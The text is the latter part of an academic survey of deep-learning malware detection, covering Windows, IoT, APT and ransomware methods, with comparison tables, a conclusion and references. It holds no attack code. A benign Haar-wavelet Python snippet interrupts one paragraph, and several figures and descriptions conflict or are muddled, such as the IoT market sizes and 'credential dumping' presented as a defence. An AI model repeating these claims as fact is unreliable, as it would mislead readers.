Deep CNN and Xception CNN models are combined for malware visualization and classification in Windows and IoT environments [284]. The deep CNNs use grayscale, RGB and Markov images with both traditional learning and transfer learning. First, all malware images are generated from the malware binaries; during Markov image creation, the Markov probability matrix plays a key role in retaining the global statistics of the malware bytes. A Gabor filter-based technique is used to extract textures, and the deep CNNs are trained on the ImageNet dataset, which comprises 1.5 million images. On the 500 GB Microsoft malware challenge dataset, the approach obtains accuracies of 99.05% for the custom CNN and 99.22% for the Xception CNN.

PROUD-MAL, a deep unsupervised Windows malware detection framework based on static analysis, is proposed in [285]. During training, pseudo labels are used for the feature attention blocks of its feature attention-based neural network (FANN) architecture. A real-time malware dataset is collected by deploying low- and high-interaction honeypots on an enterprise organizational network. After post-processing and cleaning, a 25 GB dataset of 15,457 Portable Executable samples is obtained, of which 8775 are malicious and 6681 are benign. PROUD-MAL achieves an accuracy above 98.09% on the created dataset, which is regarded as superior to current conventional ML techniques. Table 14 compares the important features of deep learning-based Windows malware detection techniques.

Table 14
Comparison of Windows malware detection techniques using DL.
Research paper | Features | Type of malware | Algorithms of classification
Rizvi et al. (2022) [285] | FANN, static analysis | Windows | PROUD-MAL
Sharma et al. (2022) [284] | Markov images, transfer learning | Windows & IoT | Deep CNN and Xception CNN
Aslam et al. (2021) [283] | PCA and autoencoder | Windows | HFVC, OEL and BENN
Shiv Darshan et al. (2019) [281] | Behaviour, Relief feature selection | Windows | CNN
Huang et al. (2018) [282] | Cuckoo sandbox | Windows | Visualization technique and CNN
Xu et al. (2016) [279] | Hybrid analysis | Windows | HADM, DNN
David et al. (2015) [32] | Behaviour report | Windows | DeepSign, DNN+SVM

6.4. IoT malware detection techniques

According to a McKinsey Global Institute report, 127 new devices are connected to the IoT every second, and the IoT market is expected to exceed 64 billion USD by 2025, which shows that it remains at the top; it is forecast to reach 11 trillion USD in 2025 [286,287]. As organizations around the world increasingly use IoT devices, the possibility of attacks has also increased in recent years [288]. The current state of IoT security is described in depth in [289], along with the areas that need further attention. Classical protection systems such as anti-virus software cannot act proactively to detect malware because of the enormous amount of new malware developed every day.

A malware detection method using deep eigenspace learning is implemented in the Internet of Battlefield Things (IoBT) environment based on opcode sequences [65]. Eigenspace learning is used to differentiate legitimate from illegitimate apps, and applying ML in this way avoids junk-code insertion attacks. Neural networks and Decision Trees (DT) provide a detection accuracy of 94.93%, while Naive Bayes (NB) and K-Nearest Neighbour (KNN) are also used, with a malware detection accuracy of 95.90%.

Three different DL-based malware detection approaches that employ CNNs with various features, such as byte sequences, colour images, and assembly sequences, are surveyed in [290]. A training dataset is created from 15,000 IoT malware samples and 1000 legitimate samples. According to the implementation results, assembly sequences are more accurate than byte sequences. IoT system attack models
are investigated on the basis of ML techniques such as supervised learning, unsupervised learning, and reinforcement learning. When an SVM is used to detect IoT-based Android malware, it attains an accuracy of 0.99 on the dataset created in [291], which employs the Naive Bayes classifier [292]. This classification method, in which a decision tree is also used, attains 98% accuracy. Further, a similar decision tree-based detection method obtained an F-score of 97% [293]; with Naive Bayes the F-score is 51%, and Logistic Regression attains a 94% F-score. An IoT malware detection method that uses a KNN classifier and considers the fingerprint feature for extraction attains 98.2% accuracy [44].

To minimize damage to IoT devices, Dynamic Analysis for IoT Malware Detection (DAIMD) is proposed to detect both well-known and novel IoT malware [104]. The DAIMD scheme uses a CNN model for learning. Dynamic IoT malware analysis is performed in a nested cloud environment, and behaviours associated with memory, network, virtual file system, process, and system calls are extracted. The extracted behaviours are converted into behaviour images, and a CNN is then trained to categorize those images.

To tackle the difficulty of representing malware consistently across platform variations, the RGB image approach [268] is advised for representing IoT features. The created image includes various information about the malware, such as binary, assembly, and visible strings. An enhanced CNN that combines a self-attention mechanism with spatial pyramid pooling is used to identify the variants, and it overcomes the input-size issues related to IoT malware. Compared with several state-of-the-art methods on 10,000 samples (i.e., 25 families), the proposed method achieves 98.57% accuracy for IoT malware.

A Lightweight Convolutional Neural Network (LCNN)-based IoT malware classification approach is proposed in [267]. Multidimensional Markov images are obtained by converting malware binaries, without reverse engineering or dynamic analysis. To classify the malware images, LCNN is designed around two operations: depthwise convolutions and channel shuffle. The LCNN model is much smaller (1 MB) than the VGG16 model (552.57 MB). The proposed model attains 95% accuracy on the grey images of various IoT malware datasets and 99.356% accuracy on the Microsoft dataset.

Fed-IIoT, a federated learning (FL)-based Android malware detection architecture for the Industrial IoT suggested by Taheri et al. [294], consists of two parts: a participant side and a server side. On the participant side, Generative Adversarial Networks (GAN) and federated GAN are used to poison the data by implementing two poisoning attacks. The server side is responsible for global model monitoring and robust training model construction. In addition, a defence algorithm called avoiding anomaly in aggregation by a GAN network (A3GAN), which combines FL and GAN algorithms, is proposed to detect server-side adversaries. The Byzantine defence algorithm is modified and adopted, and two countermeasure solutions, Byzantine Median (BM) and Byzantine Krum (BK), are applied to verify effectiveness. Based on the results, accuracy increases by 8% compared with existing methods.

An effective feature subset selection approach based on meta-heuristic methods such as scatter search (ScS) and K-Medoid sampling is proposed to detect IoT botnet cyber-attacks [295]. To achieve optimal detection of IoT botnets with reduced features, various classifiers are used, such as the Averaged Two-dependence Estimator (A2DE) Bayesian classifier, the JChaid* decision tree, a DL-based CNN, a deep MLP, and unsupervised classification using hybrid K-means clustering and genetic algorithm (HGC). The UNSW-NB15 dataset is used for the experiments. According to the results, 100% accuracy and a 0 false alarm rate are attained for identifying network breaches.

A deep active learning-based IIoT malware detection framework is proposed that uses PSE (phase space embedding), SAE (sparse autoencoder) and an LSTM (long short-term memory) network, with an action-value function for training the active learners [296]. Upon identifying an occurrence, this approach treats PSE or SAE as a policy when deciding how to proceed. It is a hypothetical framework in which fusion strategies are evaluated to improve malware classification performance. Based on the experimental results, using 50% of the training data, a classification accuracy of 95.1% and an adversarial classification accuracy of 86.9% are achieved.

An IoT malware detection and prevention framework is proposed using hybrid optimization techniques and deep learning [297]. A cyber security warning system is developed with a large-scale dataset, in which an index system is first designed and index factors are then selected and computed to evaluate the situation. The Grey Wolf Optimization (GWO) algorithm and the Whale Optimization algorithm are integrated to build the framework (WGWO). GWO improves feature selection by removing noisy features to obtain appropriate ones, and a smart initialization step integrates various pre-processing methods to ensure informative features. A TensorFlow deep neural network is used for classification, and malware samples for testing are gathered from the Mailing database. Results show that a high accuracy of 99% is obtained.

A deep learning (DL)-based Bidirectional Gated Recurrent Unit-Convolutional Neural Network (Bi-GRU-CNN) model is proposed for detecting IoT malware and classifying its families [298]. The byte sequences of binary files in ELF (Executable and Linkable Format) are provided as input features to the Bi-GRU-CNN model, and its performance is evaluated against combinations of RNN-based DL models. According to the results, 100% accuracy is attained for IoT malware detection and 98% accuracy for IoT malware family classification.

A three-phase deep malware detection framework, DMD-DWT-GAN, is proposed for IoT-based smart agriculture (IoT-SA) systems by combining the Discrete Wavelet Transform (DWT) and a Generative Adversarial Network (GAN) [299]. A multi-resolution analysis is performed by applying DWT, where the image is decomposed into Approximation coefficients (Ac) and Detail Coefficients (Dc).
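The decomposition into Ac and Dc used by DMD-DWT-GAN [299] can be illustrated with a single-level 2-D Haar transform. This sketch assumes a grayscale malware image stored as a list of equal-length rows with even height and width; the wavelet family and decomposition depth used in [299] are not stated here, so Haar and one level are illustrative choices, and the function names are hypothetical. The `(cA, (cH, cV, cD))` return layout follows the convention of PyWavelets' `pywt.dwt2`, although the code does not depend on that library.

```python
def haar_dwt2(image):
    """Single-level orthonormal 2-D Haar DWT of a grayscale image.

    `image` is a list of equal-length rows with even height and width.
    Returns (cA, (cH, cV, cD)): approximation coefficients (Ac) and the
    horizontal, vertical and diagonal detail coefficients (Dc).
    """
    rows, cols = len(image), len(image[0])
    if rows % 2 or cols % 2:
        raise ValueError("image height and width must both be even")
    cA, cH, cV, cD = [], [], [], []
    for i in range(0, rows, 2):
        a_row, h_row, v_row, d_row = [], [], [], []
        for j in range(0, cols, 2):
            # Each 2x2 block [[a, b], [c, d]] yields one coefficient per sub-band.
            a, b = image[i][j], image[i][j + 1]
            c, d = image[i + 1][j], image[i + 1][j + 1]
            a_row.append((a + b + c + d) / 2)  # scaled block sum (low-pass)
            h_row.append((a + b - c - d) / 2)  # top row minus bottom row
            v_row.append((a - b + c - d) / 2)  # left column minus right column
            d_row.append((a - b - c + d) / 2)  # diagonal difference
        cA.append(a_row)
        cH.append(h_row)
        cV.append(v_row)
        cD.append(d_row)
    return cA, (cH, cV, cD)


def haar_idwt2(cA, details):
    """Invert haar_dwt2, rebuilding the image from Ac and Dc."""
    cH, cV, cD = details
    image = []
    for i in range(len(cA)):
        top, bottom = [], []
        for j in range(len(cA[0])):
            A, H, V, D = cA[i][j], cH[i][j], cV[i][j], cD[i][j]
            top += [(A + H + V + D) / 2, (A + H - V - D) / 2]
            bottom += [(A - H + V - D) / 2, (A - H - V + D) / 2]
        image.append(top)
        image.append(bottom)
    return image


cA, (cH, cV, cD) = haar_dwt2([[1, 2], [3, 4]])
print(cA, cH, cV, cD)  # [[5.0]] [[-2.0]] [[-1.0]] [[0.0]]
```

Because the transform is orthonormal, `haar_idwt2` reconstructs the input exactly; applying `haar_dwt2` again to `cA` would produce the next, coarser resolution level of a multi-resolution analysis.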
Table 15
Comparison of recent IoT malware detection techniques using DL.
Research paper | Features | Type of malware | Algorithms of classification
Santosh et al. (2022) [299] | Multiresolution & in-depth analysis, LCNN, MalImg datasets | IoT | DMD-DWT-GAN
Chaganti et al. (2022) [298] | ELF, RNN-based DL model combinations | IoT | Bi-GRU-CNN
Nagaraju et al. (2022) [297] | GWO & Whale optimization, TensorFlow DNN | IoT | Hybrid optimization (WGWO)
Khowaja et al. (2021) [296] | PSE, SAE, hypothetical framework, IIoT | IoT | Q-learning and LSTM
Panda et al. (2021) [295] | A2DE Bayesian, JChaid* DT, Deep CNN, Deep MLP, hybrid K-means clustering and HGC | IoT | Scatter search (ScS) and K-Medoid sampling
Taheri et al. (2021) [294] | Federated GAN, A3GAN, Byzantine defence algorithm | IoT | Fed-IIoT
Yuan et al. (2021) [267] | Multidimensional Markov images, depthwise convolution and channel shuffle | IoT malware | LCNN
Li et al. (2021) [268] | Binary, assembly and visible string | IoT malware | Enhanced CNN
Jeon et al. (2020) [104] | Behaviour images | IoT malware | DAIMD
Duc Nguyen et al. (2019) [44] | Fingerprint feature | IoT malware | KNN
Nguyen et al. (2018) [290] | Byte sequence, colour images, and assembly sequences | IoT malware | CNN
Azmoodeh et al. (2018) [65] | Sequence of opcodes | IoT malware | Deep eigenspace learning

In-depth analysis of malware families is then performed with a lightweight Convolutional Neural Network (LCNN) that acts as a multi-class classifier. The IoT malware and MalImg datasets are used to evaluate the performance of the proposed framework, and experimental results show that 99.99% accuracy is attained on both datasets. Table 15 contrasts the most recent methods used to identify IoT malware using machine learning.

6.5. APT detection techniques

The Advanced Persistent Threat (APT) attack is an expensive and frequently used destructive attack on a target system, and it has become a challenge for the information security systems of businesses, governments, and organizations. Methods that use machine learning or deep learning algorithms to examine clues and unusual patterns in network data for detecting and stopping APT assaults have gained popularity in recent years.

A Deep Belief Network (DBN) is used for malware detection in [300], and the system's performance is compared with that of classical neural networks. The malware detection system is also analysed with various ML classifiers such as DT, SVM, and KNN. DBN overcomes the issues of signature-based methods and enables precise detection through autoencoders, which reduce the complexity of the feature set. Concealed executable program files are revealed with the help of SVM, NB, and DT.

To prevent cryptographic functions from being abused for financial gain, the Maximal Frequent Pattern of live ransomware is exploited [46]. An MLP algorithm is used to analyse the threat, attaining 99% accuracy with a time of 10 s. Some ransomware families are not detectable by the MLP; this can be resolved using Dynamic Link Libraries, which also minimizes the false positive rate.

An RNN is used to detect malware at early stages by analysing the behaviour of static and dynamic data with the help of a sandbox [34]. Besides, an RNN with Hidden Markov Models provides the maximum accuracy for forecasting malware. Malicious payloads are blocked, reducing the risk of malware exploiting vulnerabilities, and the detection time is reduced by 94%, i.e., to within 5 s.

An APT attack is challenging to identify because of how long it stays active on the network and the risk that its huge traffic volume would crash the system. A 6-layer deep learning model that automatically extracts and selects features in the neural network's hidden layers is suggested in [301]. For rapid detection and classification of APT attacks on the NSL-KDD dataset, machine learning techniques such as C5.0 decision trees, Bayesian networks, and deep learning are employed, and 10-fold cross-validation is used to test these models. Based on the experimental findings, accuracies of 95.64%, 88.37%, and 98.85% are obtained for the C5.0 decision tree, Bayesian network, and 6-layer deep learning models, respectively. Compared with earlier work on APT attack detection on the NSL-KDD dataset, the 6-layer deep learning model exhibited the best performance in terms of accuracy.

The Strange Behaviour Inspection (SBI) model is implemented for detecting APT attacks on the first potential victim [302]. It mainly concentrates on tracking the footsteps of APT attacks, for which behavioural characteristics of the potential victim machine were investigated and selected. The credential dumping approach is used to stop APT attackers from obtaining complete user and password lists and to stop data exfiltration by APT attackers. It is also used to monitor dangerous activity on the CPU, file systems, RAM, and the Microsoft Windows registry. Based on the experimental results, the SBI model attained 99.8% detection accuracy and reduced the detection time to 2.7 min.

A hybrid deep learning technique employing a Stacked Autoencoder with Long Short-Term Memory (SAE-LSTM) and Convolutional Neural Networks with Long Short-Term Memory (CNN-LSTM) evaluates large amounts of network traffic to look for signs of APT assaults [303]. The approach is assessed using the valid dataset "DAPT2020", which includes all APT stages. The experimental findings show that the hybrid technique outperformed the individual deep learning models in detecting malicious behaviour at each APT stage.

A combined deep learning model is used to detect APT assaults based on network traffic analysis [304]. To study and detect indications of APT assaults in network traffic, separate deep learning networks, including a multilayer perceptron (MLP), a convolutional neural network (CNN), and long short-term memory (LSTM), are designed and integrated into combined deep learning networks. The combined model detects APT attack signals in two main steps: extracting flow-based IP features and classifying APT attack IPs. The combined deep learning model demonstrated in
the experimental section its improved ability to ensure accuracy on all measurements, which range from 93% to 98%.

An explainable intelligence-driven APT defence mechanism is proposed on the basis of an edge game and edge AI (Artificial Intelligence) approach [305]. The mechanism supports real-time APT detection, intelligence generation and explanatory function analysis. An Edge Bayesian Stackelberg game and threat intelligence-based defence strategy model is developed to balance rapid response against resource allocation, modelling the interactions between defender and attacker. Equilibrium and existence conditions are provided for the APT defence game, and optimal solutions for attackers and defenders are derived for various kinds of resource budgets. The approach protects edge devices against attack models over dynamic games.

To detect APT malware on workstations, a deep graph network-based method that analyses the behaviour profile of malware is proposed [306]. It consists of two primary tasks. In the first task, behaviour profiles of malware are built by collecting and validating the event IDs of kernel workstations; once built, the profiles are labelled as normal, malicious, suspicious or unknown. In the second task, malware is detected by analysing the behaviour profiles with a Graph Convolutional Network (GCN) using the Graph Isomorphism Network (GIN) method. The experiments show 90.57% accuracy, 90.51% precision, and 90.57% recall. The latest DL-based APT detection techniques are compared in Table 16.

Table 16
Comparison of recent APT detection techniques using DL.
Research paper | Features | Type of malware | Algorithms of classification
Xuan et al. (2022) [306] | GCN, GIN, behaviour profile | APT | Deep graph network
Li et al. (2022) [305] | Edge game and edge AI, Edge Bayesian Stackelberg game | APT | Explainable Intelligence-Driven Defence Mechanism
Xuan et al. (2021) [304] | Network traffic analysis, MLP, CNN, LSTM | APT | Combined deep learning model
Alrehaili et al. (2021) [303] | SAE-LSTM, CNN-LSTM, DAPT2020 | APT | Hybrid deep learning technique
Mohamed et al. (2021) [302] | Credential dumping technique, footsteps of APT attack, first potential victim | APT | SBI Model
Hassannataj et al. (2020) [301] | NSL-KDD dataset, C5.0 decision trees, Bayesian networks | APT | 6-layer deep learning model
Rhode et al. (2018) [34] | Behaviours | APT | RNN with Hidden Markov Model

6.6. Ransomware detection techniques

Ransomware represents a very significant threat, since new families and variants are consistently being discovered on the internet and the dark web. Because of the encryption techniques they employ, ransomware outbreaks are challenging to recover from. The rise of ransomware is also related to the expansion of artificial intelligence. Building on machine learning, deep learning can identify zero-day threats; hence there is great interest in researching deep learning-based ransomware detection methods.

The Deep Ransomware Threat Hunting and Intelligence System (DRTHIS) is implemented to classify samples as malicious or benign and to attribute each ransomware sample to its family [307]. To classify ransomware, a CNN is combined with an LSTM with the help of the Softmax algorithm, and results of 97.2% TPR and 2.7% FPR are obtained.

An Industrial IoT-based ransomware detection model is developed using Asynchronous Peer-to-Peer Federated Learning (AP2PFL) and Deep Learning (DL) techniques [308]. This model comprises two modules: the Data Purifying Model (DPM) and the Diagnostic and Decision Module (DDM). DPM performs data refinement and representation using a Contractive Denoising Auto-Encoder (CDAE). DDM identifies ransomware and its stages based on a Deep Neural Network (DNN) and Batch Normalization (BN). Every edge gateway module communicates asynchronously with its neighbours. The model handles homogeneous and heterogeneous data and combats evasion attacks. The X-IIoTID, ISOT, and NSL-KDD datasets are used to validate the proposed experimental setup, and robustness is evaluated using black-box and white-box evasion attack methods.

A dual generative adversarial network detection framework, based on a Deep Convolutional Generative Adversarial Network (DCGAN) and a Transferred Generating Adversarial Network-Intrusion Detection System (TGAN), is proposed to detect attacks by anonymous variants of encrypted ransomware [309]. In TGAN, a transfer learning mechanism is used to enhance adversarial sample generation and detection ability. In addition, a reconstruction loss function is established to increase the ability of the discriminator. The CICIDS2017, KDD99, SWaT and WADI datasets are used for experimentation, and the performance of TGAN-IDS is evaluated with metrics such as detection accuracy, recall and F1-score. Table 17 provides a summary of recently proposed DL-based ransomware detection techniques.

Table 17
Comparison of recent Ransomware detection techniques using DL.
Type of method | Research paper | Features | Algorithms of classification
Network traffic monitoring-based | Zhang et al. (2022) [309] | CICIDS2017, KDD99, SWaT, WADI, transfer learning | DCGAN & TGAN
Others | Al-Hawawreh et al. (2021) [308] | DPM, DDM, DNN, BN | AP2PFL
API calls-based | Homayoun et al. (2019) [307] | CNN, LSTM, Softmax algorithm | DRTHIS

7. Inference

In this section, the conclusions drawn from this comprehensive examination are presented.

• Malware detection methods with 100% efficiency in terms of accuracy, TPR, FPR, precision, and recall remain an elusive goal for developers, because new-generation malware is coded in complicated ways and employs advanced evasion techniques against familiar protection mechanisms such as firewalls and anti-virus software.
• Static analysis techniques cannot handle malware that incorporates obfuscation techniques. Static analysis does not require a runtime environment, and it provides better results for familiar malware families.
• Behaviour- and signature-based approaches fail against the obfuscation techniques implemented in malware, so dynamic analysis is applied. Later, a combination of static and dynamic analysis (hybrid analysis) techniques is employed for more efficient results.
• Visualization and image-based analysis techniques are incorporated to create image-based feature sets that reduce complexity. Deep learning models such as CNN and RNN are then used alone or in combination with ML classifiers.
• Over 50% of digitally connected people in the world use Windows. To counter the increasing number of violations in the Windows environment, hybrid analysis methods are applied for feature extraction, and deep learning models such as CNN are employed for classifying malware instead of ML classifiers.

• The Internet of Things is expanding as more and more devices become interconnected, yet even the companies that make these devices often lack the necessary security expertise. A combination of ML classifiers and DL models is encouraged for classification. Feature extraction draws on both static and dynamic analysis, using parameters such as heuristics, power usage, colour images, and byte sequences.
• APTs are sophisticated, targeted attacks that can serve purposes such as denial of service. Predicting an APT before it starts executing in the runtime environment is a difficult and risky task. Recent APT detection methods use automatic detection frameworks with features based on sockets, IP addresses, Open XML, real-time traffic, etc.
• Ransomware attacks target private and confidential information, which they encrypt using cryptographic functions. Recent ransomware detection techniques can be classified by method into (i) behaviour-based, (ii) IRP monitoring-based, (iii) network (NW) traffic monitoring-based, (iv) memory-based, (v) API calls-based, and (vi) Android environment-based techniques, along with other methods derived from these.
• The Android environment appears less secure than Mac OS, and personal information is the main target. Mobile malware detection methods use static, dynamic, and image-based analysis techniques. ML classifiers are also used for feature extraction, while classification is performed with DL models.
• Overall, current malware detection methods should incorporate (i) an intelligent system, (ii) automated detection mechanisms, and (iii) early-stage detection without delay. Together, these factors would provide a protection mechanism that helps combat new-generation malware effectively.

8. Conclusion

Being proactive rather than reactive is a key lesson that security teaches us. Today, developing a malware detection system is challenging, especially when dealing with new-generation malware. Advanced evasion strategies have driven the evolution of new generations of malware with significant impact. Deep Learning-based malware detection technology, however, reduces the shortcomings of conventional detection methods. This paper presents a systematic review of malware detection using Deep Learning techniques. Based on the evolution towards Deep Learning-based techniques, a research taxonomy is proposed. Recent techniques for detecting malware on Android, iOS, IoT, and Windows, as well as APTs and ransomware, are also explored and compared. Finally, by giving researchers a thorough understanding of malware analysis, this study aims to steer them in the appropriate direction for developing mitigation approaches for both conventional and complex malware.

Declaration of competing interest

The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper.

Data availability

Data will be made available on request.

Acknowledgments

The authors would like to thank VIT-AP University, the editors and the reviewers. The authors would like to thank Dr. S. V. Kota Reddy, Vice Chancellor, VIT-AP University, for his continuous support and encouragement. A special thanks to Dr. Hari Seetha, Dr. Ganesh Reddy Karri, Devi Priya V.S and the team members of the Center of Excellence, Cyber Security & Artificial Intelligence and Robotics (AIR), VIT-AP University. The author Mr. M. Gopinath would like to thank Miss Winny Elizabeth Philip for continuously supporting and helping to carry out this research.

References

[1] R. Anderson, et al., Measuring the cost of cybercrime, in: The Economics of Information Security and Privacy, Springer, Berlin, Germany, 2013, pp. 265–300.
[2] https://ciso.economictimes.indiatimes.com/news/most-firms-see-rise-in-cyberattacks-during-pandemic-survey/75043660.
[3] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-covid-19-report-reveals-pandemic-threat-evolution/.
[4] https://www.marketsandmarkets.com/Market-Reports/malware-analysis-market-108766513.html.
[5] https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2019-2020.pdf.
[6] Priyanka Dixit, Sanjay Silakari, Deep learning algorithms for cybersecurity applications: A technological and status review, Comp. Sci. Rev. (ISSN: 1574-0137) 39 (2021) 100317.
[7] Omer Aslan, Refik Samet, A comprehensive review on malware detection approaches, IEEE Access 8 (2020) 6249–6271.
[8] Y. Li, K. Xiong, T. Chin, C. Hu, A machine learning framework for domain generation algorithm-based malware detection, IEEE Access 7 (2019) 32765–32782.
[9] E. Gandotra, D. Bansal, S. Sofat, Malware analysis and classification: a survey, J. Inf. Secur. 5 (2014) 56–64.
[10] N. Udayakumar, V.J. Saglani, A.V. Cupta, T. Subbulakshmi, Malware classification using machine learning algorithms, in: 2018 2nd International Conference on Trends in Electronics and Informatics, ICOEI, Tirunelveli, 2018, pp. 1–9.
[11] M. Alazab, S. Venkataraman, P. Watters, Towards understanding malware behaviour by the extraction of API calls, in: Proc. 2nd Cybercrime Trustworthy Comput. Workshop, Jul. 2010, Vol. 7, 2019, pp. 52–59, 46736.
[12] M. Tang, M. Alazab, Y. Luo, Big data for cybersecurity: Vulnerability disclosure trends and dependencies, IEEE Trans. Big Data 5 (3) (2019) 317–329.
[13] D. Gibert, C. Mateu, J. Planes, A hierarchical convolutional neural network for malware classification, in: The International Joint Conference on Neural Networks 2019, IEEE, 2019, pp. 1–8.
[14] M. Alazab, Profiling and classifying the behavior of malicious codes, J. Syst. Softw. 100 (2015) 91–102.
[15] S. Huda, J. Abawajy, M. Alazab, M. Abdollalihian, R. Islam, J. Yearwood, Hybrids of support vector machine wrapper and filter based framework for malware detection, Future Gener. Comput. Syst. 55 (2016) 376–390.
[16] M. Alazab, S. Venkatraman, P. Watters, M. Alazab, A. Alazab, Cybercrime: The case of obfuscated malware, in: C.K. Georgiadis, H. Jahankhani, E. Pimenidis, R. Bashroush, A. Al-Nemrat (Eds.), Global Security, Safety and Sustainability & e-Democracy, in: Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol. 99, Springer, Berlin, Germany, 2012.
[17] E. Raff, J. Sylvester, C. Nicholas, Learning the PE header, malware detection with minimal domain knowledge, in: Proc. 10th ACM Workshop Artif. Intell. Secur., ACM, New York, NY, USA, 2017, pp. 121–132.


[18] C. Rossow, et al., Prudent practices for designing malware experiments: Status quo and outlook, in: Proc. IEEE Symp. Secur. Privacy, SP, 2012, pp. 65–79.
[19] H.S. Anderson, A. Kharkar, B. Filar, P. Roth, Evading Machine Learning Malware Detection, Black Hat, New York, NY, USA, 2017.
[20] R. Verma, Security analytics: Adapting data science for security challenges, in: Proc. 4th ACM Int. Workshop Secur. Privacy Anal., ACM, New York, NY, USA, 2018, pp. 40–41.
[21] Y. LeCun, Y. Bengio, G. Hinton, Deep learning, Nature 521 (7553) (2015) 436–444.
[22] Sudhakar, S. Kumar, An emerging threat fileless malware: a survey and research challenges, Cybersecur 3 (2020) 1.
[23] Sibi Chakkaravarthy, D. Sangeetha, V. Vaidehi, A survey on malware analysis and mitigation techniques, Comp. Sci. Rev. 32 (2019) 1–23.
[24] Daniel Gibert, Carles Mateu, Jordi Planes, The rise of machine learning for detection and classification of malware: Research developments, trends and challenges, J. Netw. Comput. Appl. (ISSN: 1084-8045) 153 (2020) 102526.
[25] N. Koroniotis, N. Moustafa, E. Sitnikova, Forensics and deep learning mechanisms for botnets in internet of things: A survey of challenges and solutions, IEEE Access 7 (2019) 61764–61785.
[26] Priyanka Dixit, Sanjay Silakari, Deep learning algorithms for cybersecurity applications: A technological and status review, Comp. Sci. Rev. (ISSN: 1574-0137) 39 (2021) 100317.
[27] A. Davis, M. Wolff, Deep learning on disassembly data, 2015, URL: https://www.blackhat.com/docs/us-15/materials/us-15-Davis-Deep-Learning-On-Disassembly.pdf.
[28] R. Pascanu, J.W. Stokes, H. Sanossian, M. Marinescu, A. Thomas, Malware classification with recurrent networks, in: 2015 IEEE International Conference on Acoustics, Speech and Signal Processing, ICASSP, 2015, pp. 1916–1920, http://dx.doi.org/10.1109/ICASSP.2015.7178304.
[29] O.D. Gibert Llauradó, Convolutional Neural Networks for Malware Classification (Master's thesis), Universitat Politècnica de Catalunya, 2016.
[30] M. Ahmadi, D. Ulyanov, S. Semenov, M. Trofimov, G. Giacinto, Novel feature extraction, selection and fusion for effective malware family classification, in: Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy, CODASPY '16, ACM, New York, NY, USA, 2016, pp. 183–194.
[31] W. Hardy, L. Chen, S. Hou, Y. Ye, X. Li, Dl4md: A Deep Learning Framework for Intelligent Malware Detection, The Steering Committee of The World Congress in Computer Science, Computer Engineering and Applied Computing (WorldComp), Athens, 2016, pp. 61–67.
[32] O.E. David, N.S. Netanyahu, Deepsign: deep learning for automatic malware signature generation and classification, in: 2015 International Joint Conference on Neural Networks, IJCNN, 2015, pp. 1–8.
[33] E. Raff, J. Barker, J. Sylvester, R. Brandon, B. Catanzaro, C. Nicholas, Malware detection by eating a whole exe, 2017, [Online]. Available: https://arxiv.org/abs/1710.09435.
[34] M. Rhode, P. Burnap, K. Jones, Early-stage malware prediction using recurrent neural networks, Comput. Secur. 77 (2018) 578–594.
[35] M. Krčál, O. Švec, M. Bálek, O. Jašek, Deep convolutional malware classifiers can learn from raw executables and labels only, 2018, [Online]. Available: https://openreview.net/forum?id=HkHrmM1PM.
[36] E. Rezende, G. Ruppert, T. Carvalho, A. Theophilo, F. Ramos, P. de Geus, Malicious software classification using VGG16 deep neural network's bottleneck features, in: Information Technology-New Generations, Springer, Cham, Switzerland, 2018, pp. 51–59.
[37] A.F. Agarap, F.J.H. Pepito, Towards building an intelligent anti-malware system: A deep learning approach using support vector machine (SVM) for malware classification, 2017.
[38] W. Huang, J.W. Stokes, Mtnet: A multi-task neural network for dynamic malware classification, in: Proc. Int. Conf. Detection Intrusions Malware, Vulnerability Assessment, Springer, Cham, Switzerland, 2016, pp. 399–418.
[39] A. Feizollah, N.B. Anuar, R. Salleh, G. Suarez-Tangil, S. Furnell, Androdialysis: analysis of android intent effectiveness in malware detection, Comput. Secur. 65 (2017) 121–134.
[40] Zhiang Fang, Jun Yeonjoon Wang, Jiaxuan Geng, Xuan Khan, Feature Selection for Malware Detection Based on Reinforcement Learning, Vol. 7, IEEE, 2019, 176177-176187.
[41] I. Firdausi, C. Lim, A. Erwin, A.S. Nugroho, Analysis of machine learning techniques used in behavior-based malware detection, in: Proceedings of the 2nd International Conference Advances on Computing Control, and Telecommunications Technology, 2010, pp. 201–203.
[42] W. Han, J. Xue, Y. Wang, L. Huang, Z. Kong, L. Mao, Maldae: detecting and explaining malware based on correlation and fusion of static and dynamic characteristics, Comput. Secur. 83 (2019a) 208–233.
[43] W. Han, J. Xue, Y. Wang, Z. Liu, Z. Kong, Malinsight: a systematic profiling based malware detection framework, J. Netw. Comput. Appl. 125 (2019b) 236–250, http://www.sciencedirect.com/science/article/pii/S1084804518303503.
[44] T. Duc Nguyen, S. Marchal, A.-R. Sadeghi, DÏoT: a self-learning system for detecting compromised IoT devices, in: Proc. 39th IEEE Int. Conf. Distrib. Comput. Syst., IEEE, 2019.
[45] F. Wu, L. Xiao, J. Zhu, Bayesian model updating method based android malware detection for IoT services, in: 2019 15th International Wireless Communications and Mobile Computing Conference, IWCMC 2019, IEEE, 2019, pp. 61–66.
[46] M. Moradi, M. Zulkernine, A neural network based system for intrusion detection and classification of attacks, in: Proceedings of the IEEE International Conference on Advances in Intelligent Systems-Theory and Applications, 2004, pp. 15–18.
[47] H. Zhu, Y. Li, R. Li, J. Li, Z. You, H. Song, SEDMDroid: An enhanced stacking ensemble framework for android malware detection, IEEE Trans. Netw. Sci. Eng. 8 (2) (2021) 984–994.
[48] Gurumayum Akash Sharma, Khundrakpam Johnson Singh, Maisnam Debabrata Singh, A deep learning approach to image-based malware analysis, progress in computing, analytics and networking, in: Advances in Intelligent Systems and Computing 1119, 2020, pp. 327–339.
[49] A. Irshad, R. Maurya, M.K. Dutta, R. Burget, V. Uher, Feature optimization for run time analysis of malware in windows operating system using machine learning approach, in: 2019 42nd International Conference on Telecommunications and Signal Processing, TSP, Budapest, Hungary, 2019, pp. 255–260.
[50] Z.A. Genç, G. Lenzini, P.Y.A. Ryan, No random, no ransom: a key to stop cryptographic ransomware, in: C. Giuffrida, S. Bardin, G. Blanc (Eds.), DIMVA 2018, in: LNCS, vol. 10885, Springer, Cham, 2018, pp. 234–255.
[51] T. Shibahara, T. Yagi, M. Akiyama, D. Chiba, T. Yada, Efficient dynamic malware analysis based on network behavior using deep learning, in: Proc. IEEE Global Commun. Conf., GLOBECOM, 2016, pp. 1–7.
